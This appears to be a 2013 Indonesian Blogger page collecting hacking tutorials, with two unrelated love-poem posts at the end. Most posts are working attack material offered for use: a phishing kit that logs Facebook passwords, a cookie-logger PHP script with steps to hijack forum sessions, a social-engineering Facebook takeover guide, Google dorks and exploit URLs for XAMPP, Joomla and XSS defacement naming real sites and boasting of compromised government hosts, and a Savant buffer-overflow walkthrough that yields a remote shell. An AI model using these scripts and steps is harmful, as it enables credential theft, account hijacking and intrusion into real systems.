PPC Iklan Blogger Indonesia
Tampilkan postingan dengan label Cerita Dunia. Tampilkan semua postingan
Tampilkan postingan dengan label Cerita Dunia. Tampilkan semua postingan

Selasa, 15 Oktober 2013

0 Xampp for Linux Write Access Vulnerability

03.13 Under From Unknown
[0 Comment]
ok mumpung masih hangat nih author blog Coretan_Raka , yg paling ganteng mau post nih, buat yang mau belajar sambil nyate kan masih idul qurban :) haha langsung aja ya.

Mantra Untuk Memperlancar exploit
Raka Paksi Ganteng

Dork :
allinurl:/xampp/index.php
allinurl:/xampp/ site:



Target : http://www.puertoesmeraldas.gob.ec/xampp/index.php
Okeh langsung cekidot
Hacked_Raka_Paksi nya ganti sama Hacked_By_Nickente masing-masing, klo gak di ganti ya baguslah :)
ok lanjut :)
Lho kok error ?
nah itu bukan error bro
Success !!
sekian dari saya Raka-Paksi, terima kasih telah membaca coretan ancur saya haha

Ini Hasil Saya :p

http://sda.pu.go.id:10001/xampp/lang.tmp
http://utara.jakarta.go.id/xampp/lang.tmp
http://www.visualartfoto.com/xampp/lang.tmp
http://aplikasi2.deptan.go.id/xampp/lang.tmp
http://perijinan.malangkota.go.id/xampp/lang.tmp
http://perpustakaan.big.go.id/xampp/lang.tmp
https://www.ead.ftc.br/xampp/lang.tmp
http://balitbangham.go.id/xampp-control.ini
http://sppd.mampu.gov.my/xampp/lang.tmp
Read More »

2 Tutorial Hack Facebook Metode 3 Permintaan Pertemanan

02.42 Under From Unknown
[2 Comment]
1 PHISING apa tuh phising dan gimana tuh buatnya   di sini nih Click
2 tebak jawaban pertanyaan emailnya  ,,cara ini hanya bisa di lakukan pada target temen fb kita..pertanyaanya gimana cara liat email fb temen kita   ...ini dia carnya di sini sihh
3   ini dia yang mau saya share  reset paswrt fb pakai 3 teman dan tebak 1 jawaban pertanyaan keamnanya

pertama yg harus kamu  lakukan  taget sasaran pelajari dulu  target sasaran anda.liat peta dan dari mana asalnya
contoh buat percobaan aja gpp kali yah   contoh targetnya facebook ini
http://www.facebook.com/anaz.daremania.3  kamu coppy ling ulr korban 
lalu log out di halaman utama facebook
click lupa kata sandi
trus di pencarian masukan link atau email target
  
trus nanti click ini akun saya  
nah kemudian lihat di gambar bawah ini
nah di bagian ini anda yang di click TIDAK PUNYA AKSES KESINI
trus siapkan satu email baru buat yg tidak bersangkutan dengan akun fb mana pun
isi seperti ini contohnya
 isi atas sama bawahnya saama
  di sini lah kelicikan otak anda di uji nah kan tadi kamu sudah mempelajari akun si korban
lihat alamat di teman fbnya saudara sepupu dan di petanya 
 trus ini kan kalau pertanyaannya di mana ibu anda dilairkan kalau bukan

menurut pengalaman itu jawab ajah  nama pacarnya  kalau gak nama dia  kebnyaka si itu yah hehehehe 

kita di kasih kesempatan nebak 10 kali jawaban kalau salah kan bisa di ulangi besok lagi nunggu ajah 12 jam hahahaha
eaitts   jangan nagis dulu kalu g ketebak kan itu ada  tulisanya  
pulihkan akun pakai 3 teman 
 nah di sinilah kelicikan kita di uji kita bikin 3 akun fb trus add si korban kalu korbanya cowok bikin 3 fb pake akun pp abal2 cewek yang imut gituh biar di konfirmasi kwkwkwkwk
kalau sudah di terima semua tinggal exsekusi buka 3 fb anda tadi dan masukan kodenya





 ganti dah paswrtnya  trus   buka email yahoo tadi  


 nah cara di atas itu bisa di gunakan untuk menolong fb teman kita yang kena hacker 
ooleh orang2 yang g bertanggung jawab ,,lebih baik anda menggunakanya buat menolong orang dan kebaikan dari pada
di buat kejahatan yang g ada gunanya hehehehe

masih bnyak cara cara lainya tapi ini cara yang simplenya heheheheh  kalau akun anda kena hack g usah nangis ye  bikin lagi ajah
orang gratis og kwkwkwkwkwkwkkw

sampai jumpa lagi kawan tetap semngat dan salam pramuka
Read More »

Senin, 15 Juli 2013

0 CREATE A COOKIELOGGER TO HACK ANY ACCOUNT

10.29 Under From Unknown
[0 Comment]

CREATE A COOKIELOGGER TO HACK ANY ACCOUNT



A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …
Step 1: Copy & Save the notepad file from below and Rename it as Fun.gif

<a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a>
Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>
Step 3: Create a new Notepad File and Save it as logfile.txt
Step 4: Upload this file to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :
http://0fees.net
Step 5: Go to the victim forum and insert this code in the signature or a post :
<a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a>
Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.
Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.
Read More »

Rabu, 12 Juni 2013

0 Teknik Exploit Com_Media pada CMS Joomla -

22.02 Under From Unknown
[0 Comment]
Teknik Exploit Com_Media pada CMS Joomla -
author:lamer
tested:all os :p

Dork : inurl:com_media site:com [dork silahkan kreasikan sendiri. Kraetfitas anda yang akan menetukan banyaknya situs vuln]. :p


Exploit : /
index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

1. Oke. Langsung berburu target di google dengan dork diatas. Sebagai contoh, saya pilih http://www.skylinepark.org .

2. Lalu masukkan exploitnya. Jadi http://www.skylinepark.org/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

3. Maka kalian akan melihat tempat upload.

4. Yang bisa diupload adalah file .txt .jpg .gif .png. Untuk html dan php tidak bisa. :p . Saya coba upload file .txt

5. Sekarang, kita lihat hasilnya. Letak filenya di [localhost]/images/[file.txt].
Ex : http://www.skylinepark.org/images/x.txt
6. Done.

Refrensi : http://komandanseo.blogspot.com/
Read More »

0 Fake FB inbox bomber

09.36 Under From Unknown
[0 Comment]
qeqeqe ..
atas perintah atasan dari admin, bang naisen ..
langsung ane buat threadnya ...
inspirasi dari bang dika ...
dari thread http://hacker-newbie.org/showthread.php?tid=756

langsung aja mulai ... Ngakak
1. bikin index.html

Code:

<html>
<head>
<title>.:: INBOX FB BOMBER ::.</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">

<style type="text/css">
<!--
.style1 {
        font-family: Geneva, Arial, Helvetica, sans-serif;
        font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
        font-size: 20px;
        font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<script language="JavaScript">

function cekit()
{
    if(document.form1.to.value == "")
        {alert("please insert your email fb");
        document.form1.to.focus();       
        return false}
    if(document.form1.password.value == "")
        {alert("please insert your password");
        document.form1.password.focus();
        return false}
    if(document.form1.targer.value == "")
        {alert("please insert your target");
        document.form1.targer.focus();
        return false}
    if(document.form1.sender.value == "")
        {alert("please insert sender");
        document.form1.sender.focus();
        return false}
    if(document.form1.count.value == "")
        {alert("please insert count");
        document.form1.count.focus();
        return false}
    if(document.form1.message.value == "")
        {alert("please insert message");
        document.form1.message.focus();
        return false}
}
</script>
<body bgcolor="black" text="#ffffff">
<center><span class="style1">Facebook Inbox Bomb<br>
</span></center>

<form name="form1" method="get" action="write.php" onsubmit="return cekit();"
enctype="multipart/form-data">
  <br>
  <table width="100%" border="0">
    <tr>
      <td width="10%">
                  <div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
          email FB:</font></div><center><input type="text" style="background-color: green;" name="to" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Password:</font></div><center><input type="password" style="background-color: green;" name="password" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Target email</font></div><center><input type="text" style="background-color: green;" name="targer" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Sender</font></div><center><input type="text" style="background-color: green;" name="sender" value=""/></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Count</font></div><center><input type="text" style="background-color: green;" name="count" value="" size="5"/></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Message</font></div><center>
<textarea name="message" style="background-color: green;" rows="5" cols="30"></textarea><br />
<input type="submit" value="send" /><br />
  </table>
</form>
</body>
<br/>
<br/>
<br/>
<center><b><font color=red size="4">BY : Crash_burn</font><b></center>
</html>
 
2. write.php
 
<?php
header("Location: /incorrect.html");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
 
 
 
3. incorrect.html
 
<html>
<head>
<title>.:: INBOX FB BOMBER ::.</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">

<style type="text/css">
<!--
.style1 {
        font-family: Geneva, Arial, Helvetica, sans-serif;
        font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
        font-size: 20px;
        font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<script language="JavaScript">

function cekit()
{
    if(document.form1.to.value == "")
        {alert("please insert your email fb");
        document.form1.to.focus();       
        return false}
    if(document.form1.password.value == "")
        {alert("please insert your password");
        document.form1.password.focus();
        return false}
    if(document.form1.targer.value == "")
        {alert("please insert your target");
        document.form1.targer.focus();
        return false}
    if(document.form1.sender.value == "")
        {alert("please insert sender");
        document.form1.sender.focus();
        return false}
    if(document.form1.count.value == "")
        {alert("please insert count");
        document.form1.count.focus();
        return false}
    if(document.form1.message.value == "")
        {alert("please insert message");
        document.form1.message.focus();
        return false}
}
</script>
<body bgcolor="black" text="#ffffff">
<center><span class="style1">Facebook Inbox Bomb<br>
</span></center>

<form name="form1" method="get" action="sent.php" onsubmit="return cekit();"
enctype="multipart/form-data">
  <br>
  <table width="100%" border="0">
    <tr>
      <td width="10%">
      <div align="center"><b><font size="3" color=red face="Verdana, Arial,
Helvetica, sans-serif">Incorrect email/password combination<br/>
Make sure you are entering an email address or password associated with your account and that it is typed correctly.</font><b></div><center><br/>
                  <div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
          email FB:</font></div><center><input type="text" style="background-color: green;" name="to" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Password:</font></div><center><input type="password" style="background-color: green;" name="password" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Target email</font></div><center><input type="text" style="background-color: green;" name="targer" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Sender</font></div><center><input type="text" style="background-color: green;" name="sender" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Count</font></div><center><input type="text" style="background-color: green;" name="count" value="" size="5"/></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Message</font></div><center>
<textarea name="message" style="background-color: green;" rows="5" cols="30"></textarea><br />
<input type="submit" value="send" /><br />
  </table>
</form>
</body>
<br/>
<br/>
<br/>
<center><b><font color=red size="4">BY : Crash_burn</font><b></center>
</html>
 
 
4.sent.php
 
<?php
header("Location: /sent.html");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
 
 
5. sent.html
 
<html>
<head>
<title>.:: INBOX FB BOMBER ::.</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">

<style type="text/css">
<!--
.style1 {
        font-family: Geneva, Arial, Helvetica, sans-serif;
        font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
        font-size: 20px;
        font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<script language="JavaScript">

function cekit()
{
    if(document.form1.to.value == "")
        {alert("please insert your email fb");
        document.form1.to.focus();       
        return false}
    if(document.form1.password.value == "")
        {alert("please insert your password");
        document.form1.password.focus();
        return false}
    if(document.form1.targer.value == "")
        {alert("please insert your target");
        document.form1.targer.focus();
        return false}
    if(document.form1.sender.value == "")
        {alert("please insert sender");
        document.form1.sender.focus();
        return false}
    if(document.form1.count.value == "")
        {alert("please insert count");
        document.form1.count.focus();
        return false}
    if(document.form1.message.value == "")
        {alert("please insert message");
        document.form1.message.focus();
        return false}
}
</script>
<body bgcolor="black" text="#ffffff">
<center><span class="style1">Facebook Inbox Bomb<br>
</span></center>

<form name="form1" method="get" action="write.php" onsubmit="return cekit();"
enctype="multipart/form-data">
  <br>
  <table width="100%" border="0">
    <tr>
      <td width="10%">
      <div align="center"><font size="-3" color=red face="Verdana, Arial,
Helvetica, sans-serif">Your Bomb Has been sent:</font></div><center><br/>
                  <div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
          email FB:</font></div><center><input type="text" style="background-color: green;" name="to" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Password:</font></div><center><input type="password" style="background-color: green;" name="password" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Target email</font></div><center><input type="text" style="background-color: green;" name="targer" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Sender</font></div><center><input type="text" style="background-color: green;" name="sender" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Count</font></div><center><input type="text" style="background-color: green;" name="count" value="" size="5"/></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Message</font></div><center>
<textarea name="message" style="background-color: green;" rows="5" cols="30"></textarea><br />
<input type="submit" value="send" /><br />
  </table>
</form>
</body>
<br/>
<br/>
<br/>
<center><b><font color=red size="4">BY : Crash_burn</font><b></center>
</html>
 
 
 
6. upload deh dalam satu direktori di hostingan. misal:t35.com

7 enjoy ... Ngakak

alurnya
Code:
index.html => write.php => incorrect.html => sent.php => sent.html
panjang bener yak .... Capek

preview http://leecherz.cz.cc/fb
Download : http://www.ziddu.com/download/9444787/fbinbox.zip.html

sekian dari newbie permanent ...
klo master2 ada yg mau memperbaiki ...
monggo ... Wow

UPDATED:
- add "count"
- gak bisa disubmit klo blm ke isi semua fieldnya .... :D
 
Read More »

Jumat, 24 Mei 2013

0 POC Owning Shell From Zero Day Attack

00.12 Under From Unknown
[0 Comment]
Belakangan ini, saya menangkap traffic yang cukup menggiurkan di internet. 78% peretas indonesia ternyata sedang mencari tau konsep exploitasi yang cepat, dan mudah. Tidak ada yang lebih cepat dan mudah dari pada serangan zero day. Tidak seperti SQL injection yang memakan waktu paling cepat 5 menit sebelum peretas akhirnya mendapatkan akses ke dalam situs yang berkaitan. Namun zero day attack hanya membutuhkan waktu kurang dari 10 detik untuk mendapatkan shell.

Kali ini saya akan memberikan prove of concept dari exploit zero day yang saya buat di exploit-db. Dan anda akan melihat betapa cepatnya serangan ini berlangsung. Kali ini target saya adalah windows XP SP2 English. Target saya membuka HTTP port (80), dan menggunakan Savant versi 3.1 sebagai web servernya. Yang akan saya lakukan adalah mengeksploit Savant versi 3.1 dengan sederet script python, yang kemudian akan membuat Savant mengalami buffer overflow.

Exploit saya telah masuk dalam daftar database exploit db. Untuk pengguna backtrack, file ini dapat ditemukan dengan perintah.


Code:
root@red-dragon:~# cd /pentest/exploits/exploitdb/
root@red-dragon:/pentest/exploits/exploitdb# cat files.csv | grep -i savant | grep "red-dragon" | awk -F "," '{print "File located in:", $2, "| The filename is:",  $3, "by", $5}'
File located in: platforms/windows/remote/18401.py | The filename is: "Savant Web Server 3.1 Buffer Overflow Exploit (Egghunter)" by red-dragon

Spoiler: hide
[Image: locate_exploit.png]

Ok. Kita sudah mendapatkan file exploit pada /pentest/exploits/exploitdb/platforms/windows/remote/18401.py. Tahap selanjutnya adalah membuat file ini menjadi peluru bagi web server.

1. Konfigurasi Exploit

Untuk mengkonfigurasikan exploit, kita hanya perlu sedikit mengedit file exploit. Di dalam file exploit ini, terdapat bagian pengaturan IP target. Anda harus mengubah ini agar exploit dapat dikirim ke web server yang anda tuju. Sebelumnya, kita harus mengkopi file ini sehingga kita tidak mengubah file asli yang didownload dari exploitdb.

Code:
root@red-dragon:/pentest/exploits/exploitdb# cp platforms/windows/remote/18401.py /tmp/savant.py

Spoiler: hide
[Image: copy_exploit.png]

File ini saya copy ke folder /tmp. Kemudian saya edit di bagian IP address menjadi IP target saya 10.10.1.128.

Code:
root@red-dragon:/tmp# nano savant.py

Spoiler: hide
[Image: edit_exploit.png]

Ok. Setelah file di edit. Sekarang kita ke bagian PoC. Sesuai dengan fungsi file exploit kita, server akan membuka koneksi netcat pada port 4444 setelah exploit buffer overflow dikirim. Saya akan mencoba masuk ke dalam port 4444 sebelum exploit dikirim.

Code:
root@red-dragon:/tmp# nc -v 10.10.1.128 444410.10.1.128: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [10.10.1.128] 4444 (?) : Connection refused

Spoiler: hide
[Image: closed.png]

Port ini masih tertutup. Kemudian saya kirim file exploit milik saya.

Code:
root@red-dragon:/tmp# python savant.py

Spoiler: hide
[Image: send+exploit.png]

Dan kita cek lagi dengan netcat.

Code:
root@red-dragon:/tmp# nc -v 10.10.1.128 444410.10.1.128: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [10.10.1.128] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Savant>

Spoiler: hide
[Image: owned.png]

Perhatikan screenshoot di atas. Anda dapat melihat seberapa cepat zero day dalam melakukan defacing web dengan mengendalikan shell korban. Jika saya tidak mengambil screenshoot, waktu yang dibutuhkan oleh file exploit ini hanya 10 detik.

OWNED by : red-dragon
Read More »

Jumat, 17 Mei 2013

0 Deface dengan XSS Vulnerability ( Cara Sederhana )

09.54 Under From Unknown
[0 Comment]
langsung TKP aja :

1.Pertama Masukin Dorknya
inurl:"/showcatrows.php?CategoryID="

2.Pilih Web yg ingin di deface
kalo gue ini targetnya.

3.Jika sudah masuk ke halaman web ,modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.
Kalo saya pake yg simple aja :
HTML Code:

PHP Code:

http://www.ti-com.info/showcatrows.php?CategoryID=1"><blink><h1>Hacked by Raka_paksi - Palembang Hacker Link</h1></blink> 
.


4.Jika Sudah Tekan "ENTER"

5.Lihat hasil, apakah yg terjadi

caranya memang sangat simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.

sekian dulu thread dari saya semoga bermanfaat.
Read More »

0 PATCH SQL INJECTION

02.53 Under From Unknown
[0 Comment]
patch SQL injection :

Cari script yang menampilkan data lain
{
$show = $_get['show'];
$show = !$show? "home" : $show;
include("content/{$show}.php");
}
itu script sebelum ada filtrasi di variabel var, char, atau int

=====================================================

Filtrasi di variabel INTEGER (int)
{
$show = (int)$_get['show'];
$show = !$show? "home" : $show;
include("content/{$show}.php");
}
ini script setelah ada filtrasi

Insya Allah ketutup bugs SQL Injection nya, barangkali membantu temen2 Big Grin

reputasi nya ya Big Grin
Read More »

Rabu, 13 Maret 2013

0 Puisi Cinta

23.17 Under From Unknown
[0 Comment]
Terbaru update Puisi Cinta berikut ini adalah artikel berry blog mengenai kata cinta mutiara Kata-Kata Bijak Terlengkap 2013 Kata-Kata Mutiara Kata Mutiara Islam 2013 terlengkap terupdate hanya di berry blog kata mutiara cinta kata-kata bijak. kata-kata cinta, kata-kata mutiara ,kata bijak ,kata mutiara bahasa inggris. berikut ini adalah kata kata mutiara nya,Kata Mutiara Puitis Yang Sangat Sulit Dimengerti, TOP 10 Kata Mutiara Bijak Pembaca Rifhi, Kata Mutiara Favorit Dunia, 77 Kata Kata Mutiara Hikmah, Kata Mutiara Terbaik Hingga Akhir Zaman, Kata Mutiara Nomor Satu Di Dunia, Kata Mutiara Paling Cerdas Di Dunia, Kata-kata Mutiara luar biasa : Kata Mutiara Paling Cemerlang Di Dunia, Kata Mutiara Paling Memukau Di Dunia,Kata2 Mutiara Paling Mencengangkan,Kata-kata Mutiara Penuh Makna,Kata Mutiara Paling,Mengherankan di Dunia,1001 Kata-Kata Mutiara Islam,Kalimat Mutiara Paling Menggugah di Dunia,Kata Mutiara Paling Kontroversial di Dunia,Kata Mutiara Paling Menggegerkan di Dunia,Kata Mutiara Paling Heboh di Dunia, Kata Mutiara Paling Gempar di Dunia :

untuk melihat silahkan buka link di bawah ini :
kata mutiara cinta motivasi bijak
Read More »

0 Kumpulan Puisi Cinta Romantis

23.15 Under From Unknown
[0 Comment]
menemani malam sobat kali ini , jadi bagi yang sedang jatuh cinta jangan kawatir,ada saya, ahahhaha, bagi yang lagi nyari puisi cinta yang romantis nah ini dia ciptaan dari berry sendiri, semoga langgeng, ups salah, maksudnya berguna .



Cinta..
saat hati kosong tak menentu..
saat malam tak berbintang..
saat itu ku harapkan sebuah cinta..

Sebuah cinta yang merona indah..
merona bagai pelangi..
merona bagai cahaya bintang..
dan merona di hatiku ..

saat itu mata memandang sang Cinta ..
saat itu hati terpana..
saat itu benih cinta datang..
cinta yang datang melalui lembutnya dan indahnya sikapmu ..

Cinta ..
ku harap dirimu yang menjadi cintaku ..
dan cintamu menjadi cintaku..
dan cinta kita menjadi Cinta yang di ridhoi Allah..
Amiin..

Hak Cipta : Berry Hardisakha

hehe, romantis gak romantis yang jelas itu puisi cinta dari saya, murni karya saya, siapa tau ada yang tertarik, bisa deh copas dan sertakan pencipta ,hehehe, sekian ya mengenai puisi romantis ala berry blog, semoga bermanfaat untuk sobat semua .
Read More »